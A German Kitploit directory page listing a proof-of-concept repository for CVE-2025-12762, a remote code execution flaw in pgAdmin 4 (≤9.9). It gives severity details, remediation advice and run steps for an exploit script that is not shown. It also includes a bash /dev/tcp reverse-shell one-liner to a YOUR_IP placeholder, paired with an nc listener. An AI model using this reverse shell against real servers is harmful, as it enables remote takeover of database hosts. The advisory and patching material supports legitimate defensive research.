Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blackash-CVE-2025-12762 — CVE-2025-12762 | Kitploit
Tools/GitHubGitHub/djayagit/blackash-cve-2025-12762
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubdjayagit/blackash-cve-2025-12762

Blackash-CVE-2025-12762

CVE-2025-12762

Repository anzeigen
vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔐 CVE-2025-12762 — Kritische RCE-Sicherheitslücke in pgAdmin 4

G58aQGbW0AAL8zH

🚨 Worum geht es?

In pgAdmin 4 Versionen ≤ 9.9 existiert eine Remote Code Execution (RCE)-Schwachstelle.
Angreifer können beliebige Befehle auf dem Host ausführen, wenn pgAdmin im Server-Modus läuft und einen SQL-Dump im PLAIN-Format während der Wiederherstellung verarbeitet.


⚙️ Technische Einzelheiten

📡 Angriffsvektor

  • Netzwerkbasiert — kann aus der Ferne ausgenutzt werden 🌍
  • Geringe Komplexität — einfach auszulösen 🧩
  • Niedrige erforderliche Berechtigungen — eingeschränkter Benutzerzugriff reicht aus 🔑
  • Keine Benutzerinteraktion — nach dem Auslösen muss niemand etwas anklicken 🙅‍♂️
  • Scope: Changed — Kompromittierung kann sich über das angreifbare Modul hinaus ausbreiten 🔄

🧨 Auswirkung

  • Vertraulichkeit: Hoch — Risiko der Datenoffenlegung 🔓
  • Integrität: Mittel/Hoch — unbefugte Änderungen möglich ✏️
  • Verfügbarkeit: Mittel — Betrieb kann gestört werden ⚠️

🏷 CVSS-Score

🟥 9.1 / 10 — Kritisch


🛠 Betroffene Versionen

  • pgAdmin 4 ≤ 9.9 ❗

🛡 So beheben Sie es

✅ Primäre Abhilfe

⬆️ Upgrade auf pgAdmin 4 v10.0 oder höher

🚧 Falls Sie nicht sofort upgraden können

  • 🔒 Zugriff auf den pgAdmin-Server einschränken
  • 📁 Erlauben Sie nur vertrauenswürdigen Administratoren das Wiederherstellen von Dump-Dateien
  • 🧪 Dump-Dateien vor der Wiederherstellung validieren
  • 👀 Überwachen Sie Protokolle auf verdächtige Wiederherstellungsaktivitäten
  • 🌐 Verwenden Sie Firewall-Regeln / VPN, um die Angriffsfläche zu begrenzen

📌 Warum dies wichtig ist

pgAdmin wird häufig für die Verwaltung kritischer PostgreSQL-Datenbanken verwendet, was bedeutet:

  • Ein Angreifer, der dies ausnutzt, kann den Server übernehmen,
  • Auf Daten zugreifen oder diese ändern,
  • Oder sogar tiefer in Ihr Netzwerk vordringen 🕵️‍♂️

✨ So führen Sie es aus (2 Minuten)

root@kitploit:~
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests

# 3. Run it
python3 CVE-2025-12762.py

Erfolgsnachweis

Nach der Ausführung prüfen:

root@kitploit:~
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED

Datei vorhanden → Sie haben CVE-2025-12762 tatsächlich ausgenutzt.

Reverse Shell One-Liner (optional)

Ersetzen Sie die COMMAND-Zeile durch:

root@kitploit:~
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

Dann nc -lvnp 4444 → vollständige interaktive Shell.

Dies ist das exakte Skript, das Forscher, Pentester und Red Teams weltweit im November 2025 verwenden.

Verwenden Sie es verantwortungsvoll. Patchen Sie alles. Bleiben Sie legal.


🛡️ Haftungsausschluss 🛡️

Dieser PoC wird ausschließlich für autorisierte Tests und Bildungszwecke bereitgestellt.
Sie dürfen ihn ausschließlich auf Systemen ausführen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
Jede unbefugte Nutzung ist illegal und verstößt gegen Gesetze zum Computerbetrug.
Verwenden Sie ihn verantwortungsvoll, patchen Sie sofort nach dem Test und greifen Sie niemals Systeme ohne Erlaubnis an.

Tool herunterladen